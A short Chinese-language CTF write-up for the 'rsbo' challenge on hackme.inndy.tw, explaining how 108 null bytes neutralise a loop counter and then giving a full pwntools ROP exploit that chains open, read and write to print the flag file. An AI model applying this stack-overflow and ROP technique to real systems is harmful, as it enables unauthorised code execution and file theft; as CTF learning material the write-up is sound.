×

rsbo

96
D4rk3r
2018.09.09 15:44 字数 142
保护
main函数

有个栈溢出可以rop,但是下面的for循环会破坏rop链,然后看了下charlie师傅的wp才知道,这里发送108个\x00,当修改到v8的值的时候,修改为0,然后就跳出for循环了,不会影响后面的rop。然后就利用open,read,write函数rop就行了。注意fd = 0时代表标准输入stdin,1时代表标准输出stdout,2时代表标准错误stderr,3~9则代表打开的文件

完整exp:

from pwn import *
#context.log_level = 'debug'

#p = process('./rsbo',env = {"LD_PRELOAD":"../libc-2.23.so.i386"})
p = remote('hackme.inndy.tw',7706)
elf = ELF('./rsbo')

write_plt = elf.plt['write']
open_plt = elf.plt['open']
read_plt = elf.plt['read']
start_addr = elf.symbols["_start"]
flag_addr = 0x080487D0
bss_addr = elf.bss()

#open('/home/ctf/flag',0)
payload = '\x00'*108 + p32(open_plt)
payload += p32(start_addr) + p32(flag_addr) + p32(0)
p.send(payload)

#read(3,bss,0x60)
payload = '\x00'*108 + p32(read_plt)
payload += p32(start_addr) + p32(3) + p32(bss_addr) + p32(0x60)
p.send(payload)

#write(1,bss,0x60)
payload = '\x00'*108 + p32(write_plt) + 'aaaa'
payload += p32(1) + p32(bss_addr) + p32(0x60)
p.send(payload)

flag = p.recvuntil('}')
print flag

p.close()
#p.interactive()
hackme.inndy_wp
Web note ad 1